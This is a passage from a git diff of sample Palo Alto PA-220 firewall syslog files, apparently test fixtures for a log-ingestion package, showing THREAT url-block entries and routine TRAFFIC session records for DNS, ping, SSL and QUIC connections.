16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log index c3e74310f06..ba304bf40ac 100644 --- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log +++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log @@ -1,100 +1,100 @@ -Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 